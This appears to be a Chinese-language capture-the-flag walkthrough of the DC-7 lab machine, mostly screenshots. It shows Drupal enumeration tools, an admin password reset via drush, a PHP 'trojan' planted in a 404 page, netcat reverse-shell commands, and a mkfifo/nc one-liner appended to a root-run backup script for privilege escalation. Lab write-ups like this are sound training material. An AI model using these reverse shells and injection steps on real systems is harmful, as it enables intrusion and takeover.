DC-7靶机
仅供个人娱乐
靶机信息
下载地址:http://www.five86.com/downloads/DC-7.zip
一、主机扫描
![](https://upload-images.jianshu.io/upload_images/4664072-b7f235f75e8eeef9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
二、信息收集
![](https://upload-images.jianshu.io/upload_images/4664072-9af3ea128db8eaca.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-c54a81c93dd559c1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
或者
python3 cmseek.py --url http://192.168.17.134
![](https://upload-images.jianshu.io/upload_images/4664072-fb9f70a2ebaa3572.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
寻找drup相关信息 在github找到脚本
pip3 install -r requirements.txt
python3 drupwn --help
![](https://upload-images.jianshu.io/upload_images/4664072-e302841ce3bfb659.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
python3 drupwn --users --nodes --modules --dfiles --themes --thread 5 enum http://192.168.17.134
![](https://upload-images.jianshu.io/upload_images/4664072-40c5d250168fbb27.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
安装脚本
git clone https://github.com/droope/droopescan.git
cd droopescan
pip3 install -r requirements.txt
droopescan scan --help
![](https://upload-images.jianshu.io/upload_images/4664072-c8d263b69701d64c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
droopescan scan drupal -u http://192.168.17.134 -t 32
![](https://upload-images.jianshu.io/upload_images/4664072-f6fdd322caf21cee.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-d4f91552ef8f75b1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
三、漏洞查找和利用
![](https://upload-images.jianshu.io/upload_images/4664072-66542a897836ba41.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
信息收集
![](https://upload-images.jianshu.io/upload_images/4664072-daafcdccdc0e17da.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-925f86ba3f809939.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
ssh 登录
$username="dc7user"; $password="MdR3xOgB7#dW";
![](https://upload-images.jianshu.io/upload_images/4664072-e5038578675b7346.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
信息收集
![](https://upload-images.jianshu.io/upload_images/4664072-a09ed220fe5ec334.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
解密邮件
![](https://upload-images.jianshu.io/upload_images/4664072-7205db0278cfe67f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-7849d3f6cd6a2ee9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-380f31b9cf7e72a6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-8b80403eaa2bef1b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-863e59cef7955048.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
进入数据库
![](https://upload-images.jianshu.io/upload_images/4664072-1c3b61ee3b680b50.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-5c79de0d389cd4b5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
hash解密失败 修改admin密码
drush user-password admin --password="test"
![](https://upload-images.jianshu.io/upload_images/4664072-7e6ecf3c06870812.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
登录后台 信息收集
![](https://upload-images.jianshu.io/upload_images/4664072-91f9c795a9d119d1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-bf325a36bdf7e346.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-b02010c92f5cc5cf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
wget https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
![](https://upload-images.jianshu.io/upload_images/4664072-5267e603b26d5c07.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-e16f3b7f6050f23f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-2da9bd43a4e70de2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
编辑404
![](https://upload-images.jianshu.io/upload_images/4664072-16dae46073b2714f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-4c3efb05a9386ff1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
插入木马
![](https://upload-images.jianshu.io/upload_images/4664072-eb5ce107a6814a3c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-ec47e7667248b25e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
nc -e /bin/bash192.168.17.134 4444
nc -lvvp 4444
python -c 'import pty;pty.spawn("/bin/bash")'
![](https://upload-images.jianshu.io/upload_images/4664072-e109f8e4e38a32e6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
cd /opt/scripts
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.17.129 1234 >/tmp/f \" >> backups.sh
![](https://upload-images.jianshu.io/upload_images/4664072-9f44d7d6542407c6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-e1f391f66ffc0229.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
得到root权限后,进入root家目录下,发现theflag.txt文件
![](https://upload-images.jianshu.io/upload_images/4664072-468a99b486ad3953.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)